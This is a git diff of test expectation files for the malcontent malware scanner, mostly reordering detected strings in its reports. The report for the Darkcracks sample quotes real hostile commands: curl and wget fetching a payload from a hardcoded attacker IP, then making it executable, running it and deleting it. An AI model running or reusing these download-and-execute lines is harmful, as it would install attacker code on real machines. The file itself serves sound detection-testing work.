[plugins](https://github.com/search?q=plugins&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://abitype.dev](https://abitype.dev)
[https://andromeda-explorer.metis.io/api](https://andromeda-explorer.metis.io/api)
[https://andromeda.metis.io/?owner=1088](https://andromeda.metis.io/?owner=1088)
[https://api-era.zksync.network/api](https://api-era.zksync.network/api)
[https://api-moonbeam.moonscan.io/api](https://api-moonbeam.moonscan.io/api)
[https://api-moonriver.moonscan.io/api](https://api-moonriver.moonscan.io/api)
[https://api-optimistic.etherscan.io/api](https://api-optimistic.etherscan.io/api)
[https://api-zkevm.polygonscan.com/api](https://api-zkevm.polygonscan.com/api)
[https://api.arbiscan.io/api](https://api.arbiscan.io/api)
[https://api.avax.network/ext/bc/C/rpc](https://api.avax.network/ext/bc/C/rpc)
[https://api.basescan.org/api](https://api.basescan.org/api)
[https://api.blastscan.io/api](https://api.blastscan.io/api)
[https://api.bscscan.com/api](https://api.bscscan.com/api)
[https://api.celoscan.io/api](https://api.celoscan.io/api)
[https://api.etherscan.io/api](https://api.etherscan.io/api)
[https://api.ftmscan.com/api](https://api.ftmscan.com/api)
[https://api.gnosisscan.io/api](https://api.gnosisscan.io/api)
[https://api.lineascan.build/api](https://api.lineascan.build/api)
[https://api.mantlescan.xyz/api](https://api.mantlescan.xyz/api)
[https://api.polygonscan.com/api](https://api.polygonscan.com/api)
[https://api.roninchain.com/rpc](https://api.roninchain.com/rpc)
[https://api.routescan.io/v2/network/mainnet/evm/43114/etherscan/api](https://api.routescan.io/v2/network/mainnet/evm/43114/etherscan/api)
[https://api.scan.pulsechain.com/api](https://api.scan.pulsechain.com/api)
[https://api.scrollscan.com/api](https://api.scrollscan.com/api)
[https://api.snowtrace.io](https://api.snowtrace.io)
[https://api.wallet.coinbase.com/rpc/v2/desktop/chrome](https://api.wallet.coinbase.com/rpc/v2/desktop/chrome)
[https://api.web3modal.org](https://api.web3modal.org)
[https://app.roninchain.com](https://app.roninchain.com)
[https://arb1.arbitrum.io/rpc](https://arb1.arbitrum.io/rpc)
[https://arbiscan.io](https://arbiscan.io)
[https://arweave.net](https://arweave.net)
[https://aurorascan.dev/api](https://aurorascan.dev/api)
[https://avatar.vercel.sh/andrew.svg?size=50](https://avatar.vercel.sh/andrew.svg?size=50)
[https://basescan.org](https://basescan.org)
[https://blastscan.io](https://blastscan.io)
[https://block-explorer-api.mainnet.zksync.io/api](https://block-explorer-api.mainnet.zksync.io/api)
[https://bobascan.com](https://bobascan.com)
[https://bscscan.com](https://bscscan.com)
[https://build.onbeam.com/rpc](https://build.onbeam.com/rpc)
[https://celoscan.io](https://celoscan.io)
[https://cloudflare-eth.com](https://cloudflare-eth.com)
[https://docs.cloud.coinbase.com/wallet-sdk/docs/errors](https://docs.cloud.coinbase.com/wallet-sdk/docs/errors)
[https://docs.soliditylang.org/en/latest/cheatsheet.html](https://docs.soliditylang.org/en/latest/cheatsheet.html)
[https://echo.walletconnect.com/](https://echo.walletconnect.com/)
[https://era.zksync.network/](https://era.zksync.network/)
[https://ethereum.org/en/developers/docs/networks/](https://ethereum.org/en/developers/docs/networks/)
[https://etherscan.io](https://etherscan.io)
[https://evm.cronos.org](https://evm.cronos.org)
[https://evm.kava.io](https://evm.kava.io)
[https://exchainrpc.okex.org](https://exchainrpc.okex.org)
[https://explorer-api.cronos.org/mainnet/api](https://explorer-api.cronos.org/mainnet/api)
[https://explorer-api.walletconnect.com](https://explorer-api.walletconnect.com)
[https://explorer.cronos.org](https://explorer.cronos.org)
[https://explorer.dogechain.dog/api](https://explorer.dogechain.dog/api)
[https://explorer.fuse.io/api](https://explorer.fuse.io/api)
[https://explorer.harmony.one](https://explorer.harmony.one)
[https://explorer.kcc.io](https://explorer.kcc.io)
[https://explorer.metis.io](https://explorer.metis.io)
[https://explorer.walletconnect.com/?type=wallet](https://explorer.walletconnect.com/?type=wallet)
[https://explorer.zksync.io/](https://explorer.zksync.io/)
[https://fonts.googleapis.com/css2?family=Inter](https://fonts.googleapis.com/css2?family=Inter)
[https://forno.celo.org](https://forno.celo.org)
[https://ftmscan.com](https://ftmscan.com)
[https://gnosisscan.io](https://gnosisscan.io)
[https://go.cb-w.com/dapp?cb_url=](https://go.cb-w.com/dapp?cb_url=)
[https://go.cb-w.com/walletlink](https://go.cb-w.com/walletlink)
[https://kavascan.com/api](https://kavascan.com/api)
[https://kcc-rpc.com](https://kcc-rpc.com)
[https://keys.coinbase.com/connect](https://keys.coinbase.com/connect)
[https://lineascan.build](https://lineascan.build)
[https://links.ethers.org/v5-errors-](https://links.ethers.org/v5-errors-)
[https://mainnet.aurora.dev](https://mainnet.aurora.dev)
[https://mainnet.base.org](https://mainnet.base.org)
[https://mainnet.boba.network](https://mainnet.boba.network)
[https://mainnet.era.zksync.io](https://mainnet.era.zksync.io)
[https://mainnet.optimism.io](https://mainnet.optimism.io)
[https://mantlescan.xyz/](https://mantlescan.xyz/)
[https://moonbeam.public.blastapi.io](https://moonbeam.public.blastapi.io)
[https://moonriver.moonscan.io](https://moonriver.moonscan.io)
[https://moonriver.public.blastapi.io](https://moonriver.public.blastapi.io)
[https://moonscan.io](https://moonscan.io)
[https://npms.io/search?q=ponyfill.](https://npms.io/search?q=ponyfill.)
[https://openchain.xyz/signatures?query=](https://openchain.xyz/signatures?query=)
[https://optimistic.etherscan.io](https://optimistic.etherscan.io)
[https://polygon-rpc.com](https://polygon-rpc.com)
[https://polygonscan.com](https://polygonscan.com)
[https://pulse.walletconnect.org](https://pulse.walletconnect.org)
[https://reactjs.org/docs/error-decoder.html?invariant=](https://reactjs.org/docs/error-decoder.html?invariant=)
[https://rpc.ankr.com/bsc](https://rpc.ankr.com/bsc)
[https://rpc.ankr.com/fantom](https://rpc.ankr.com/fantom)
[https://rpc.ankr.com/harmony](https://rpc.ankr.com/harmony)
[https://rpc.blast.io](https://rpc.blast.io)
[https://rpc.dogechain.dog](https://rpc.dogechain.dog)
[https://rpc.fuse.io](https://rpc.fuse.io)
[https://rpc.gnosischain.com](https://rpc.gnosischain.com)
[https://rpc.linea.build](https://rpc.linea.build)
[https://rpc.mantle.xyz](https://rpc.mantle.xyz)
[https://rpc.pulsechain.com](https://rpc.pulsechain.com)
[https://rpc.scroll.io](https://rpc.scroll.io)
[https://rpc.walletconnect.com/v1/?chainId=eip155](https://rpc.walletconnect.com/v1/?chainId=eip155)
[https://rpc.walletconnect.org](https://rpc.walletconnect.org)
[https://safe-client.safe.global](https://safe-client.safe.global)
[https://scan.pulsechain.com](https://scan.pulsechain.com)
[https://scrollscan.com](https://scrollscan.com)
[https://secure.walletconnect.org/sdk](https://secure.walletconnect.org/sdk)
[https://snowtrace.io](https://snowtrace.io)
[https://subnets.avax.network/beam](https://subnets.avax.network/beam)
[https://verify.walletconnect.com](https://verify.walletconnect.com)
[https://verify.walletconnect.org](https://verify.walletconnect.org)
[https://wagmi.sh/core](https://wagmi.sh/core)
[https://wagmi.sh/react](https://wagmi.sh/react)
[https://walletconnect.com/explorer?type=wallet](https://walletconnect.com/explorer?type=wallet)
[https://walletconnect.com/faq](https://walletconnect.com/faq)
[https://www.jsdelivr.com/using-sri-with-dynamic-files](https://www.jsdelivr.com/using-sri-with-dynamic-files)
[https://www.oklink.com/okc](https://www.oklink.com/okc)
[https://www.walletlink.org](https://www.walletlink.org)
[https://zkevm-rpc.com](https://zkevm-rpc.com)
[https://zkevm.polygonscan.com](https://zkevm.polygonscan.com) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://api.routescan.io/v2/network/mainnet/evm/43114/etherscan/api](https://api.routescan.io/v2/network/mainnet/evm/43114/etherscan/api)
[https://docs.soliditylang.org/en/latest/cheatsheet.html](https://docs.soliditylang.org/en/latest/cheatsheet.html)
[https://docs.cloud.coinbase.com/wallet-sdk/docs/errors](https://docs.cloud.coinbase.com/wallet-sdk/docs/errors)
[https://reactjs.org/docs/error-decoder.html?invariant=](https://reactjs.org/docs/error-decoder.html?invariant=)
[https://api.wallet.coinbase.com/rpc/v2/desktop/chrome](https://api.wallet.coinbase.com/rpc/v2/desktop/chrome)
[https://www.jsdelivr.com/using-sri-with-dynamic-files](https://www.jsdelivr.com/using-sri-with-dynamic-files)
[https://ethereum.org/en/developers/docs/networks/](https://ethereum.org/en/developers/docs/networks/)
[https://block-explorer-api.mainnet.zksync.io/api](https://block-explorer-api.mainnet.zksync.io/api)
[https://rpc.walletconnect.com/v1/?chainId=eip155](https://rpc.walletconnect.com/v1/?chainId=eip155)
[https://explorer.walletconnect.com/?type=wallet](https://explorer.walletconnect.com/?type=wallet)
[https://fonts.googleapis.com/css2?family=Inter](https://fonts.googleapis.com/css2?family=Inter)
[https://walletconnect.com/explorer?type=wallet](https://walletconnect.com/explorer?type=wallet)
[https://avatar.vercel.sh/andrew.svg?size=50](https://avatar.vercel.sh/andrew.svg?size=50)
[https://explorer-api.cronos.org/mainnet/api](https://explorer-api.cronos.org/mainnet/api)
[https://andromeda-explorer.metis.io/api](https://andromeda-explorer.metis.io/api)
[https://api-optimistic.etherscan.io/api](https://api-optimistic.etherscan.io/api)
[https://openchain.xyz/signatures?query=](https://openchain.xyz/signatures?query=)
[https://andromeda.metis.io/?owner=1088](https://andromeda.metis.io/?owner=1088)
[https://explorer-api.walletconnect.com](https://explorer-api.walletconnect.com)
[https://api-moonriver.moonscan.io/api](https://api-moonriver.moonscan.io/api)
[https://api-zkevm.polygonscan.com/api](https://api-zkevm.polygonscan.com/api)
[https://api.avax.network/ext/bc/C/rpc](https://api.avax.network/ext/bc/C/rpc)
[https://api-moonbeam.moonscan.io/api](https://api-moonbeam.moonscan.io/api)
[https://moonriver.public.blastapi.io](https://moonriver.public.blastapi.io)
[https://secure.walletconnect.org/sdk](https://secure.walletconnect.org/sdk)
[https://api.scan.pulsechain.com/api](https://api.scan.pulsechain.com/api)
[https://links.ethers.org/v5-errors-](https://links.ethers.org/v5-errors-)
[https://moonbeam.public.blastapi.io](https://moonbeam.public.blastapi.io)
[https://api-era.zksync.network/api](https://api-era.zksync.network/api)
[https://explorer.dogechain.dog/api](https://explorer.dogechain.dog/api)
[https://npms.io/search?q=ponyfill.](https://npms.io/search?q=ponyfill.)
[https://keys.coinbase.com/connect](https://keys.coinbase.com/connect)
[https://subnets.avax.network/beam](https://subnets.avax.network/beam)
[https://go.cb-w.com/dapp?cb_url=](https://go.cb-w.com/dapp?cb_url=)
[https://verify.walletconnect.com](https://verify.walletconnect.com)
[https://verify.walletconnect.org](https://verify.walletconnect.org)
[https://api.lineascan.build/api](https://api.lineascan.build/api)
[https://api.polygonscan.com/api](https://api.polygonscan.com/api)
[https://echo.walletconnect.com/](https://echo.walletconnect.com/)
[https://optimistic.etherscan.io](https://optimistic.etherscan.io)
[https://pulse.walletconnect.org](https://pulse.walletconnect.org)
[https://safe-client.safe.global](https://safe-client.safe.global)
[https://api.mantlescan.xyz/api](https://api.mantlescan.xyz/api)
[https://api.roninchain.com/rpc](https://api.roninchain.com/rpc)
[https://api.scrollscan.com/api](https://api.scrollscan.com/api)
[https://go.cb-w.com/walletlink](https://go.cb-w.com/walletlink)
[https://api.gnosisscan.io/api](https://api.gnosisscan.io/api)
[https://mainnet.era.zksync.io](https://mainnet.era.zksync.io)
[https://moonriver.moonscan.io](https://moonriver.moonscan.io)
[https://rpc.walletconnect.org](https://rpc.walletconnect.org)
[https://walletconnect.com/faq](https://walletconnect.com/faq)
[https://zkevm.polygonscan.com](https://zkevm.polygonscan.com)
[https://api.basescan.org/api](https://api.basescan.org/api)
[https://api.blastscan.io/api](https://api.blastscan.io/api)
[https://api.etherscan.io/api](https://api.etherscan.io/api)
[https://arb1.arbitrum.io/rpc](https://arb1.arbitrum.io/rpc)
[https://build.onbeam.com/rpc](https://build.onbeam.com/rpc)
[https://explorer.fuse.io/api](https://explorer.fuse.io/api)
[https://explorer.harmony.one](https://explorer.harmony.one)
[https://mainnet.boba.network](https://mainnet.boba.network)
[https://rpc.ankr.com/harmony](https://rpc.ankr.com/harmony)
[https://api.arbiscan.io/api](https://api.arbiscan.io/api)
[https://api.bscscan.com/api](https://api.bscscan.com/api)
[https://api.celoscan.io/api](https://api.celoscan.io/api)
[https://api.ftmscan.com/api](https://api.ftmscan.com/api)
[https://era.zksync.network/](https://era.zksync.network/)
[https://exchainrpc.okex.org](https://exchainrpc.okex.org)
[https://explorer.cronos.org](https://explorer.cronos.org)
[https://explorer.zksync.io/](https://explorer.zksync.io/)
[https://mainnet.optimism.io](https://mainnet.optimism.io)
[https://rpc.ankr.com/fantom](https://rpc.ankr.com/fantom)
[https://rpc.gnosischain.com](https://rpc.gnosischain.com)
[https://scan.pulsechain.com](https://scan.pulsechain.com)
[https://app.roninchain.com](https://app.roninchain.com)
[https://aurorascan.dev/api](https://aurorascan.dev/api)
[https://cloudflare-eth.com](https://cloudflare-eth.com)
[https://mainnet.aurora.dev](https://mainnet.aurora.dev)
[https://rpc.pulsechain.com](https://rpc.pulsechain.com)
[https://www.oklink.com/okc](https://www.oklink.com/okc)
[https://www.walletlink.org](https://www.walletlink.org)
[https://api.web3modal.org](https://api.web3modal.org)
[https://explorer.metis.io](https://explorer.metis.io)
[https://rpc.dogechain.dog](https://rpc.dogechain.dog)
[https://api.snowtrace.io](https://api.snowtrace.io)
[https://kavascan.com/api](https://kavascan.com/api)
[https://mainnet.base.org](https://mainnet.base.org)
[https://rpc.ankr.com/bsc](https://rpc.ankr.com/bsc)
[https://explorer.kcc.io](https://explorer.kcc.io)
[https://lineascan.build](https://lineascan.build)
[https://mantlescan.xyz/](https://mantlescan.xyz/)
[https://polygon-rpc.com](https://polygon-rpc.com)
[https://polygonscan.com](https://polygonscan.com)
[https://rpc.linea.build](https://rpc.linea.build)
[https://evm.cronos.org](https://evm.cronos.org)
[https://forno.celo.org](https://forno.celo.org)
[https://rpc.mantle.xyz](https://rpc.mantle.xyz)
[https://scrollscan.com](https://scrollscan.com)
[https://wagmi.sh/react](https://wagmi.sh/react)
[https://gnosisscan.io](https://gnosisscan.io)
[https://rpc.scroll.io](https://rpc.scroll.io)
[https://wagmi.sh/core](https://wagmi.sh/core)
[https://zkevm-rpc.com](https://zkevm-rpc.com)
[https://basescan.org](https://basescan.org)
[https://blastscan.io](https://blastscan.io)
[https://bobascan.com](https://bobascan.com)
[https://etherscan.io](https://etherscan.io)
[https://rpc.blast.io](https://rpc.blast.io)
[https://snowtrace.io](https://snowtrace.io)
[https://abitype.dev](https://abitype.dev)
[https://arbiscan.io](https://arbiscan.io)
[https://arweave.net](https://arweave.net)
[https://bscscan.com](https://bscscan.com)
[https://celoscan.io](https://celoscan.io)
[https://evm.kava.io](https://evm.kava.io)
[https://ftmscan.com](https://ftmscan.com)
[https://kcc-rpc.com](https://kcc-rpc.com)
[https://moonscan.io](https://moonscan.io)
[https://rpc.fuse.io](https://rpc.fuse.io) | | LOW | [net/url/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle) | Handles URL strings | [new URL](https://github.com/search?q=new+URL&type=code) | diff --git a/tests/linux/2024.Darkcracks/darkcracks.sh.md b/tests/linux/2024.Darkcracks/darkcracks.sh.md index 046c4f4c2..f527d6a2c 100644 --- a/tests/linux/2024.Darkcracks/darkcracks.sh.md +++ b/tests/linux/2024.Darkcracks/darkcracks.sh.md @@ -2,17 +2,17 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| CRITICAL | [evasion/file/location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | -| CRITICAL | [evasion/self_deletion/run_and_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_and_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) | +| CRITICAL | [evasion/file/location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /;](https://github.com/search?q=cd+%2F%3B&type=code) | +| CRITICAL | [evasion/self_deletion/run_and_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_and_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) | | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) | -| HIGH | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v)
[http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl) | -| HIGH | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#tool_chmod_relative_run_tiny) | fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code)
[wget http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -O agr](https://github.com/search?q=wget+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-O+agr&type=code) | +| HIGH | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl)
[http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v) | +| HIGH | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#tool_chmod_relative_run_tiny) | fetch file, make it executable, and run it | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code)
[wget http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -O agr](https://github.com/search?q=wget+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-O+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[./agr](https://github.com/search?q=.%2Fagr&type=code) | | MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/bash](https://github.com/search?q=%2Fbin%2Fbash&type=code) | | MEDIUM | [fs/file/make_executable](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-make_executable.yara#chmod_executable_shell) | makes file executable | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code) | -| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./agr](https://github.com/search?q=.%2Fagr&type=code)
[./wdvsh](https://github.com/search?q=.%2Fwdvsh&type=code) | +| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./wdvsh](https://github.com/search?q=.%2Fwdvsh&type=code)
[./agr](https://github.com/search?q=.%2Fagr&type=code) | | MEDIUM | [fs/path/root](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/root.yara#root_path_val) | path reference within /root | [/root](https://github.com/search?q=%2Froot&type=code) | | MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | | LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run](https://github.com/search?q=%2Fvar%2Frun&type=code) | | LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url) | contains embedded HTTP URLs | [http://179.191.68.85](http://179.191.68.85) | -| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code) | +| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | diff --git a/tests/linux/2024.k4spreader/knlib.simple b/tests/linux/2024.k4spreader/knlib.simple index 495ddd6e6..eacdd15c4 100644 --- a/tests/linux/2024.k4spreader/knlib.simple +++ b/tests/linux/2024.k4spreader/knlib.simple @@ -4,5 +4,6 @@ evasion/self_deletion/run_and_delete: critical exec/shell/exec: medium exec/shell/ignore_output: medium exec/shell/nohup: medium +fs/file/copy: medium fs/file/delete_forcibly: medium process/chdir: low diff --git a/tests/linux/2024.kubo_injector/injector.json b/tests/linux/2024.kubo_injector/injector.json index f09a0cc19..33bca864f 100644 --- a/tests/linux/2024.kubo_injector/injector.json +++ b/tests/linux/2024.kubo_injector/injector.json @@ -14,9 +14,6 @@ "Behaviors": [ { "Description": "multiple ELF binaries within an ELF binary", - "MatchStrings": [ - "$elf_head" - ], "RiskScore": 2, "RiskLevel": "MEDIUM", "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf", @@ -49,11 +46,11 @@ { "Description": "may inject code into other processes", "MatchStrings": [ - "/proc", - "maps", "successfully injected", "to inject", - "to-inject" + "to-inject", + "/proc", + "maps" ], "RiskScore": 3, "RiskLevel": "HIGH", @@ -149,9 +146,9 @@ { "Description": "Buffer overflow exploit", "MatchStrings": [ + "shellcode", "address", - "offset", - "shellcode" + "offset" ], "RiskScore": 3, "RiskLevel": "HIGH", @@ -162,11 +159,11 @@ { "Description": "Kubo Injector", "MatchStrings": [ - "arch2name", - "collect_libc_info", "inject_in_cloned_thread", + "collect_libc_info", + "shellcode_size", "remote_vcall", - "shellcode_size" + "arch2name" ], "RiskScore": 4, "RiskLevel": "CRITICAL", diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple index e2f9da111..2c7e0424f 100644 --- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple +++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple @@ -6,7 +6,6 @@ c2/addr/http_dynamic: medium c2/addr/ip: medium c2/addr/url: low c2/discovery/ip_dns_resolver: medium -c2/refs: high c2/tool_transfer/arch: low c2/tool_transfer/download: medium c2/tool_transfer/os: medium diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md index 4270357c9..9d6cd185b 100644 --- a/tests/linux/clean/code-oss.md +++ b/tests/linux/clean/code-oss.md @@ -5,44 +5,44 @@ | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | may check if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) | | MEDIUM | [anti-behavior/LD_PROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_PROFILE.yara#env_LD_PROFILE) | may check if dynamic linker profiling is enabled | [LD_PROFILE](https://github.com/search?q=LD_PROFILE&type=code) | | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)
[VMware](https://github.com/search?q=VMware&type=code) | -| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | $elf_head | +| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | | | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#hex_parse) | converts hex data to ASCII | [Buffer.from(padded, 'hex')](https://github.com/search?q=Buffer.from%28padded%2C+%27hex%27%29&type=code) | | MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%s](http://%s) | -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[bIp](https://github.com/search?q=bIp&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[gIp](https://github.com/search?q=gIp&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[internalPort](https://github.com/search?q=internalPort&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[maxPort](https://github.com/search?q=maxPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[minPort](https://github.com/search?q=minPort&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
